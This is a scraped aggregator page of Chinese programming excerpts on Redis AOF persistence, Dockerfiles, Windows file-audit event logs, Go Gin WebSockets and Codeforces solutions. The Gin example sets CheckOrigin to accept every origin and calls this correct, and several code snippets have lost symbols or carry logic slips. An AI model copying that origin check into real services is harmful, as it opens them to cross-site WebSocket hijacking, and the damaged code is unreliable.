问题:数据都是实时持久化到磁盘吗? 由于操作系统的缓存机制,AOF 数据并没有真正地写入硬盘,而是进入了系统的硬盘缓存。什么时候把缓冲区的内容写入到 AOF 文件? 问题:文件越来越大,怎么办? 由于 AOF 持久化是 Redis 不断将写命令记录到 AOF 文件中,随着 Redis 不断的进行,AOF 的文件会越来越大,文件越大,占用服务器内存越大以及 AOF 恢复要求时间越长。 例如 set xxx 666,执行 1000 次,结果都是 xxx=666。 为了解决这个问题,Redis 新增了重写机制,当 AOF 文件的大小超过所设定的阈值时,Redis 就会启动 AOF 文件的内容压缩,只保留可以恢复数据的最小指令集。 可以使用命令 bgrewriteaof 来重写。 AOF 文件重写并不是对原文件进行重新整理,而是直接读取服务器现有的键值对,然后用一条命令去代替之前记录这个键值对的多条命令,生成一个新的文件后去替换原来的 AOF 文件。 重写触发机制 auto-aof-rewrite-percentage 100 auto-aof-rewrite-min-size 64mb 问题:重写过程中,AOF 文件被更改了怎么办? 另外有两个与 AOF 相关的参数: 6.2.2 AOF 数据恢复 重启 Redis 之后就会进行 AOF 文件的恢复。 6.2.3 AOF 优势与劣势 优点: 1、AOF 持久化的方法提供了多种的同步频率,即使使用默认的同步频率每秒同步一次,Redis 最多也就丢失 1 秒的数据而已。 缺点: 1、对于具有相同数据的的 Redis,AOF 文件通常会比 RDB 文件体积更大(RDB 存的是数据快照)。 2、虽然 AOF 提供了多种同步的频率,默认情况下,每秒同步一次的频率也具有较高的性能。在高并发的情况下,RDB 比 AOF 具好更好的性能保证。 6.3 两种方案比较 那么对于 AOF 和 RDB 两种持久化方式,我们应该如何选择呢? 如果可以忍受一小段时间内数据的丢失,毫无疑问使用 RDB 是最好的,定时生成 RDB 快照(snapshot)非常便于进行数据库备份, 并且 RDB 恢复数据集的速度也要比 AOF 恢复的速度要快。 否则就使用 AOF 重写。但是一般情况下建议不要单独使用某一种持久化机制,而是应该两种一起用,在这种情况下,当 redis 重启的时候会优先载入 AOF 文件来恢复原始的数据,因为在通常情况下 AOF 文件保存的数据集要比 RDB 文件保存的数据集要完整。 本篇文章为转载内容。原文链接:https://blog.csdn.net/zhoutaochun/article/details/120075092。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-03-18 12:25:04
541
转载
Docker
...N apt-get update && apt-get install -y python3 COPY . /应用 WORKDIR /应用 CMD ["python3", "app.py"] 可以看到,这个Dockerfile首先从ubuntu:latest镜像作为出发点,然后装置了Python 3,接着粘贴了此刻文件夹下的所有文件到/应用目录,并且设置/应用目录为工作目录。最后,运行了一个Python 3应用程序。这个Dockerfile是一个简单的范例,你可以根据自己的需求进行修改。 除了Dockerfile之外,Docker文件夹中还包含了其他必要的文件,比如.dockerignore文件,用来指定哪些文件不需要被粘贴到Docker容器中;以及docker-compose.yml文件,用来设定多个Docker容器之间的关系。 总的来说,Docker文件夹是Docker应用程序的重要组成部分,它能够帮助我们快速制作、操控和安置Docker容器。
2024-04-07 16:13:15
555
电脑达人
Docker
...N apt-get update RUN apt-get install -y python3 RUN apt-get install -y python3-pip WORKDIR /app COPY requirements.txt /app RUN pip3 install -r requirements.txt COPY . /app CMD ["python3", "app.py"] 这个Dockerfile的作用是:运用最新版本的Ubuntu作为基础镜像,然后装置Python3和pip包管理器。我们的程序源码位于/app目录下,所以我们将运行目录设置为/app。接下来,我们将应用程序的依赖项列表存储于requirements.txt文件中,并装置这些依赖项。最后,我们拷贝整个程序源码到/app目录下,并规定了应用程序的启动指令。 当我们构建这个Docker镜像时,会执行上述Dockerfile中的指令,生成包括应用程序及其依赖项的镜像。运用以下命令来创建镜像: docker build -t myapp . 其中,“myapp”是我们为此镜像赋予的名字,点号表示运用当前目录中的Dockerfile文件。 现在,我们可以在Docker容器中执行我们的应用程序了。运用以下命令来启动容器: docker run -d -p 5000:5000 myapp 其中,“-d”选项表示在后台执行容器,“-p”选项是将容器的5000端口连接至主机的5000端口。这意味着我们可以在本地浏览器中打开http://localhost:5000来访问应用程序了。 这就是运用Docker整合应用程序的基本过程,它可以简化应用程序的构建和部署过程,提高开发效率。
2023-05-14 18:00:01
553
软件工程师
Docker
...N apt-get update && apt-get install -y curl 在镜像内安装curl命令 CMD ["curl", "https://www.docker.com"] 设置默认启动时运行的命令 在这个例子中,我们执行了三个基本操作: - FROM 指令指定了基础镜像。 - RUN 指令用于在新创建的镜像中执行命令并提交结果。 - CMD 指令设置了容器启动后的默认执行命令。 3. Dockerfile进阶 深入理解和使用指令 3.1 COPY与ADD指令 当我们需要将宿主机的文件复制到镜像内部时,可以使用COPY或ADD指令: dockerfile COPY . /app 将当前目录下的所有内容复制到镜像的/app目录下 ADD requirements.txt /app/ 添加特定文件到镜像指定位置,并支持自动解压tar归档文件 3.2 ENV指令 设置环境变量对于配置应用程序至关重要,ENV指令允许我们在构建镜像时定义环境变量: dockerfile ENV NODE_ENV=production 3.3 WORKDIR指令 WORKDIR用来指定工作目录,后续的RUN、CMD、ENTRYPOINT等指令都将在这个目录下执行: dockerfile WORKDIR /app 3.4 EXPOSE指令 EXPOSE用于声明容器对外提供服务所监听的端口: dockerfile EXPOSE 80 443 4. 高级话题 Dockerfile最佳实践与思考 - 保持镜像精简:每次修改镜像都应尽量小且独立,遵循单一职责原则,每个镜像只做一件事并做好。 - 层叠优化:合理安排Dockerfile中的指令顺序,减少不必要的层构建,提升构建效率。 - 充分利用缓存:Docker在构建过程中会利用缓存机制,如果已有的层没有变化,则直接复用,因此,把变动可能性大的步骤放在最后能有效利用缓存加速构建。 在编写Dockerfile的过程中,我们常常会遇到各种挑战和问题,这正是探索与学习的乐趣所在。每一次动手尝试,都是我们对容器化这个理念的一次接地气的深入理解和灵活运用,就好比每敲出的一行代码,都在悄无声息地讲述着我们这群人,对于打造出那种既高效、又稳定、还能随时随地搬来搬去的应用环境,那份死磕到底、永不言弃的坚持与热爱。 所以,亲爱的开发者朋友们,不妨亲手拿起键盘,去编写属于你自己的Dockerfile,感受那种“从无到有”的创造魅力,同时也能深深体验到Docker所带来的便捷和力量。在这场编程之旅中,愿我们都能以更轻便的方式,拥抱云原生时代!
2023-08-01 16:49:40
513
百转千回_
转载文章
...sID="4" ThreadID="72" /><Channel>Security</Channel><Computer>IDX-ST-05</Computer><Security /></System><EventData><Data Name="SubjectUserSid">S-1-5-21-1815651738-4066643265-3072818021-1004</Data><Data Name="SubjectUserName">lxy</Data><Data Name="SubjectDomainName">IDX-ST-05</Data><Data Name="SubjectLogonId">0x2ed3b8</Data><Data Name="ObjectServer">Security</Data><Data Name="ObjectType">File</Data><Data Name="ObjectName">C:\Data\net.txt</Data><Data Name="HandleId">0x444</Data><Data Name="AccessList">%%1537</Data><Data Name="AccessMask">0x10000</Data><Data Name="ProcessId">0x4</Data><Data Name="ProcessName"></Data></EventData></Event> 文件操作码表 File ReadAccesses: ReadData (or ListDirectory)AccessMask: 0x1File WriteAccesses: WriteData (or AddFile)AccessMask: 0x2File DeleteAccesses: DELETEAccessMask: 0x10000File RenameAccesses: DELETEAccessMask: 0x10000File CopyAccesses: ReadData (or ListDirectory)AccessMask: 0x1File Permissions ChangeAccesses: WRITE_DACAccessMask: 0x40000File Ownership ChangeAccesses: WRITE_OWNERAccessMask: 0x80000 转载于:https://blog.51cto.com/linxy/2119150 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_34112900/article/details/92532120。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 11:51:46
151
转载
Go Gin
...Upgrader{ ReadBufferSize: 1024, WriteBufferSize: 1024, CheckOrigin: func(r http.Request) bool { return true // 允许跨域 }, } func handleWebSocket(c gin.Context) { ws, err := upgrader.Upgrade(c.Writer, c.Request, nil) if err != nil { log.Println("Failed to upgrade:", err) return } defer ws.Close() for { messageType, msg, err := ws.ReadMessage() if err != nil { log.Println("Error reading message:", err) break } log.Printf("Received: %s\n", string(msg)) err = ws.WriteMessage(messageType, msg) if err != nil { log.Println("Error writing message:", err) break } } } func main() { r := gin.Default() r.GET("/ws", handleWebSocket) r.Run(":8080") } 在这段代码中,我们利用gorilla/websocket包实现了WebSocket升级,并在handleWebSocket函数中处理了消息的读取与发送。你可以试着在浏览器里输入这个地址:ws://localhost:8080/ws,然后用JavaScript发个消息试试,看能不能马上收到服务器的回应。 深入探讨 说实话,刚开始写这部分代码的时候,我还担心WebSocket的兼容性问题。后来发现,只要正确设置了CheckOrigin方法,大多数现代浏览器都能正常工作。这让我更加坚定了对Gin的信心——它虽然简单,但足够强大! --- 四、进阶技巧 并发与性能优化 在实际项目中,我们可能会遇到高并发的情况。为了保证系统的稳定性,我们需要合理地管理线程池和内存分配。Gin提供了一些工具可以帮助我们做到这一点。 例如,我们可以使用sync.Pool来复用对象,减少垃圾回收的压力。下面是一个示例: go package main import ( "sync" "time" "github.com/gin-gonic/gin" ) var pool sync.Pool func init() { pool = &sync.Pool{ New: func() interface{} { return make([]byte, 1024) }, } } func handler(c gin.Context) { data := pool.Get().([]byte) defer pool.Put(data) copy(data, []byte("Hello World!")) time.Sleep(100 time.Millisecond) // 模拟耗时操作 c.String(http.StatusOK, string(data)) } func main() { r := gin.Default() r.GET("/", handler) r.Run(":8080") } 在这个例子中,我们定义了一个sync.Pool来存储临时数据。每次处理请求时,从池中获取缓冲区,处理完毕后再放回池中。这样可以避免频繁的内存分配和释放,从而提升性能。 反思与总结 其实,刚开始学习这段代码的时候,我对sync.Pool的理解还停留在表面。直到后来真正用它解决了性能瓶颈,我才意识到它的价值所在。这也让我明白,优秀的框架只是起点,关键还是要结合实际需求去探索和实践。 --- 五、未来展望 Gin与实时处理的无限可能 Gin的强大之处不仅仅在于它的易用性和灵活性,更在于它为开发者提供了广阔的想象空间。无论是构建大型分布式系统,还是打造小型实验项目,Gin都能胜任。 如果你也想尝试用Gin构建实时处理系统,不妨从一个小目标开始——比如做一个简单的在线聊天室。相信我,当你第一次看到用户实时交流的画面时,那种成就感绝对会让你欲罢不能! 最后的话 写这篇文章的过程,其实也是我自己重新审视Gin的过程。其实这个东西吧,说白了挺简单的,但让我学到了一个本事——用最利索的办法搞定事情。希望能这篇文章也能点醒你,让你在今后的开发路上,慢慢琢磨出属于自己的那套玩法!加油吧,程序员们!
2025-04-07 16:03:11
65
时光倒流
转载文章
...ring that reads the same backward as forward. For example, the strings “z”, “aaa”, “aba”, and “abccba” are palindromes, but “codeforces” and “ab” are not. You hate palindromes because they give you déjà vu. There is a string s . You must insert exactly one character ‘a’ somewhere in s . If it is possible to create a string that is not a palindrome, you should find one example. Otherwise, you should report that it is impossible. For example, suppose s= “cbabc”. By inserting an ‘a’, you can create “acbabc”, “cababc”, “cbaabc”, “cbabac”, or “cbabca”. However “cbaabc” is a palindrome, so you must output one of the other options. Input The first line contains a single integer t (1≤t≤104 ) — the number of test cases. The only line of each test case contains a string s consisting of lowercase English letters. The total length of all strings does not exceed 3⋅105 . Output For each test case, if there is no solution, output “NO”. Otherwise, output “YES” followed by your constructed string of length |s|+1 on the next line. If there are multiple solutions, you may print any. You can print each letter of “YES” and “NO” in any case (upper or lower). Example Input Copy 6 cbabc ab zza ba a nutforajaroftuna Output Copy YES cbabac YES aab YES zaza YES baa NO YES nutforajarofatuna Note The first test case is described in the statement. In the second test case, we can make either “aab” or “aba”. But “aba” is a palindrome, so “aab” is the only correct answer. In the third test case, “zaza” and “zzaa” are correct answers, but not “azza”. In the fourth test case, “baa” is the only correct answer. In the fifth test case, we can only make “aa”, which is a palindrome. So the answer is “NO”. In the sixth test case, “anutforajaroftuna” is a palindrome, but inserting ‘a’ elsewhere is valid. 题意: 给你一个字符串,然后你可以通过在任意位置上+‘a’,然后让这个字符串不是回文字符串,如果实在无法让字符串变成非回文,则输出NO。 思路: 我们可以判断出只有全为a的回文字符串才会+‘a’后无法变成非回文串,其他的都可以在任意位置上“a”,使字符串变成非回文串,那我们可以直接在首或者尾“a”,然后循环判断是否为回文,输出非回文的那一种就可以了。 代码: include<bits/stdc++.h>using namespace std;bool judge(string p){for(int i=0,j=p.size()-1;i<j;i++,j--){if(p[i]!=p[j])return true;}return false;}int main (){int t;cin>>t;while(t--){string ch;cin>>ch;int f=0;for(int i=0;i<ch.size();i++){if(ch[i]!='a'){f=1;break;} }if(f==0){cout<<"NO"<<endl;}else{string ch1,ch2;ch1="a"+ch;ch2=ch+"a";if(judge(ch1)){cout<<"YES"<<endl;cout<<'a';for(int i=0;i<ch.size();i++) cout<<ch[i];cout<<endl;}else{if(judge(ch2)) {cout<<"YES"<<endl;for(int i=0;i<ch.size();i++) cout<<ch[i];cout<<'a';cout<<endl;}elsecout<<"NO"<<endl;} }}return 0;} B. Flip the Bits time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output There is a binary string a of length n. In one operation, you can select any prefix of a with an equal number of 0 and 1 symbols. Then all symbols in the prefix are inverted: each 0 becomes 1 and each 1 becomes 0 For example, suppose a=0111010000 since it has four 0’s and four 1’s: [01110100]00→[10001011]00 In the second operation, we can select the prefix of length 2 since it has one 0 and one 1: [10]00101100→[01]00101100 It is illegal to select the prefix of length 4 for the third operation, because it has three 0’s and one Can you transform the string a into the string b using some finite number of operations (possibly, none)? Input The first line contains a single integer t (1≤t≤104) — the number of test cases. The first line of each test case contains a single integer n (1≤n≤3⋅105) — the length of the strings a and b The following two lines contain strings a and b of length n, consisting of symbols 0 and 1 The sum of n across all test cases does not exceed 3⋅105 Output For each test case, output “YES” if it is possible to transform ainto b, or “NO” if it is impossible. You can print each letter in any case (upper or lower). Example Input Copy 5 10 0111010000 0100101100 4 0000 0000 3 001 000 12 010101010101 100110011010 6 000111 110100 Output Copy YES YES NO YES NO Note The first test case is shown in the statement. In the second test case, we transform a into b by using zero operations. In the third test case, there is no legal operation, so it is impossible to transform a into b . In the fourth test case, here is one such transformation: Select the length 2 prefix to get 100101010101 . Select the length 12 prefix to get 011010101010 . Select the length 8 prefix to get 100101011010 . Select the length 4 prefix to get 011001011010 . Select the length 6 prefix to get 100110011010 In the fifth test case, the only legal operation is to transform a into 111000. From there, the only legal operation is to return to the string we started with, so we cannot transform a into b 题意: 给你一个字符串a,b,由0,1组成,然后只有在字符串下标i前面的0,1个数相同时,你可以进行把0->1,1->0,然后看是否能进行一些操作把字符串a变成b。 思路: 这题思路有点难想,你看,它每次个数相同时,都可以进行操作,所以我们从后往前进行操作,因为如果从前往后,小区间会影响大区间的,所以从大区间向小区间进行,然后遍历字符串,将每一位的0,1的个数进行计算,然后将a,b不相同的下标进行标记为1,代表需要改变。 从后遍历,cnt进行次数,因为如果是奇数的话,才会变成不一样的数字,偶数的话,区间变化会使它变回去了,在判断当前位之前,我们先看之前的大区间的变化将当前第i位变成了什么,因为只有0,1,跟标记的0,1是代表他是否需要变化,假如说:原先为0,他后面的区间将它变化了奇数次,那么它就现在是需要变化的才能变成吧b。原先为1,它后面的区间将它变化了偶数次,就还是1。如果这个下标的标记为1,代表需要被变化,我们就判断当前位的0,1个数是否相同,相同的话就代表了一次变化cnt++,否则就退出无法变成b了,因为之后没有区间将它再次变化了。然后我们就可以判断了 代码: include<bits/stdc++.h>using namespace std;const int N=3e5+7;int s0[N],s1[N];int a[N],b[N],p[N];int main (){int t;cin>>t;while(t--){int n;cin>>n;string a,b;cin>>a>>b;memset(p,0,sizeof p);for(int i=0;i<n;i++){if(a[i]=='0'){s0[i]=s0[i-1]+1;s1[i]=s1[i-1];}else{s1[i]=s1[i-1]+1;s0[i]=s0[i-1];}if(a[i]!=b[i]){p[i]=1;//是否相同的标记} }int cnt=0;int f=0;for(int i=n-1;i>=0;i--){if(cnt%2==1){//奇数次才会被变化p[i]=1-p[i];}//而且必须在前面判这一步,因为你得先看后面的区间将这一位变成了什么if(p[i]){if(s0[i]==s1[i]) cnt++;//0,1相同时才可以进行一次变化else {f=1;break;} }}if(f==1){cout<<"NO"<<endl;}else{cout<<"YES"<<endl;} }return 0;}//这个就利用了一个标记来判断当前为被影响成了什么/01 01 01 01 01 0110 01 10 01 10 10100101010101011010101010100101011010011001011010100110011010Select the length 12prefix to get.Select the length 8prefix to get.Select the length 4prefix to get.Select the length 6prefix to get01 110100 0001 001011 00/ C. Balance the Bits time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output A sequence of brackets is called balanced if one can turn it into a valid math expression by adding characters ‘+’ and ‘1’. For example, sequences ‘(())()’, ‘()’, and ‘(()(()))’ are balanced, while ‘)(’, ‘(()’, and ‘(()))(’ are not. You are given a binary string s of length n. Construct two balanced bracket sequences a and b of length n such that for all 1≤i≤n if si=1, then ai=bi if si=0, then ai≠bi If it is impossible, you should report about it. Input The first line contains a single integer t (1≤t≤104) — the number of test cases. The first line of each test case contains a single integer n (2≤n≤2⋅105, nis even). The next line contains a string sof length n, consisting of characters 0 and 1.The sum of nacross all test cases does not exceed 2⋅105. Output If such two balanced bracked sequences exist, output “YES” on the first line, otherwise output “NO”. You can print each letter in any case (upper or lower). If the answer is “YES”, output the balanced bracket sequences a and b satisfying the conditions on the next two lines.If there are multiple solutions, you may print any. Example Input Copy 3 6 101101 10 1001101101 4 1100 Output Copy YES ()()() ((())) YES ()()((())) (())()()() NO Note In the first test case, a= “()()()” and b="((()))". The characters are equal in positions 1, 3, 4, and 6, which are the exact same positions where si=1 .In the second test case, a= “()()((()))” and b="(())()()()". The characters are equal in positions 1, 4, 5, 7, 8, 10, which are the exact same positions where si=1 In the third test case, there is no solution. 题意: 一个n代表01串的长度,构造两个长度为n的括号序列,给你一个01串,代表着a,b两个序列串字符不相同。然后你来判断是否有合理的a,b串。有的话输出。 思路: 这题想了很久想不明白,看了大佬的题解,迷迷糊糊差不多理解吧。这题是这样的,就是: (1)第一步得合法的字符串,所以首尾得是相同的且都为1 (2)第二步,因为01串长度为偶数,所以如果合法的话,得( 的个数= ) 的个数,然后你想呀,假如为 ()()()()吧,然后你有一个0破坏了一个括号,但如果合法的话,是不是得还有一个0再破坏一个括号,然后被破坏的这俩个进行分配才能合理,所以如果合法的话,01串得0的个数为偶数,1的个数自然而然为偶数吧。 (3)最后一步构造,既然1的个数为偶数,首尾又都为1,所以1的个数前sum1/2个1构造为‘( ’,后sum1/2个构造为‘)’,然后我们1的所有的目前是合法的,然后剩下的0也是偶数的,然后如果让他们合法进行分配就( )间接进行就可以了,然后我们根据01串将b构造出来。合法的核心就是当前位的(个数大于等于),所以我们在循环进行判断一下a,b串是否都满足,(其实我觉得这么构造出来,a必然合理呀,其实就判b就行了,我保险起见都判了)。 代码: include<bits/stdc++.h>using namespace std;const int N=3e5+7;char a[N],b[N];int main (){int t;cin>>t;while(t--){int n;cin>>n;string s;cin>>s;if(s[0]!=s[n-1]&&s[0]!='1'){cout<<"NO"<<endl;}else{int sum1=0,sum0=0;for(int i=0;i<s.size();i++){if(s[i]=='1') sum1++;else sum0++;}if(sum1%2!=0||sum0%2!=0){cout<<"NO"<<endl;}else{int cnt1=0,cnt0=1;for(int i=0;i<n;i++){if(s[i]=='1'&&cnt1<sum1/2){a[i]='(';cnt1++;}else if(s[i]=='1'&&cnt1>=sum1/2){a[i]=')';cnt1++;}else if(s[i]=='0'&&cnt0%2==1){a[i]='(';cnt0++;}else if(s[i]=='0'&&cnt0%2==0){a[i]=')';cnt0++;}//cout<<a[i]<<endl;}for(int i=0;i<n;i++){if(s[i]=='0'){if(a[i]=='(') b[i]=')';else b[i]='(';}else{b[i]=a[i];}//cout<<b[i]<<endl;}// cout<<"YES"<<endl;int f=0;int s0=0,s1=0;for(int i=0;i<n;i++){if(a[i]=='(') s0++;else if(a[i]==')') s1++;if(s0<s1) {f=1;break;} }s0=0,s1=0;for(int i=0;i<n;i++){if(b[i]=='(') s0++;else if(b[i]==')') s1++;if(s0<s1) {f=1;break;} }if(f==0){cout<<"YES"<<endl;for(int i=0;i<n;i++) cout<<a[i];cout<<endl;for(int i=0;i<n;i++) cout<<b[i];cout<<endl;}else{cout<<"NO"<<endl;} }} }return 0;}/01 01 01 01 01 0110 01 10 01 10 10100101010101011010101010100101011010011001011010100110011010Select the length 12prefix to get.Select the length 8prefix to get.Select the length 4prefix to get.Select the length 6prefix to get01 110100 0001 001011 00/ 本篇文章为转载内容。原文链接:https://blog.csdn.net/lvy_yu_ET/article/details/115575091。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-05 13:54:12
228
转载
转载文章
...ferences][Update Table] 5 Sprax EA 5.1 Basic Design - Toolbox Message/Argument/Return Value Publish - Save - Save to Clipboard 5.2 Advanced Copy/Paste - Copy to Clipboard - Full Structure for Duplication Copy/Paste - Paste Package from Clipboard 6 USB Win7 CMD: wmic path Win32_PnPSignedDriver | find "Android" wmic path Win32_PnPSignedDriver | find "USB" :: similar to Linux lsusb wmic path Win32_USBControllerDevice get Dependent 7 Abbreviations CAB: Capacity Approval Board NPcap: Nmap Packet Capture wmic: Windows Management Instrumentation Command-line 本篇文章为转载内容。原文链接:https://blog.csdn.net/zoosenpin/article/details/118596813。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-10 16:27:10
270
转载
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
nohup command &
- 在后台运行命令且在退出终端后仍继续运行。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"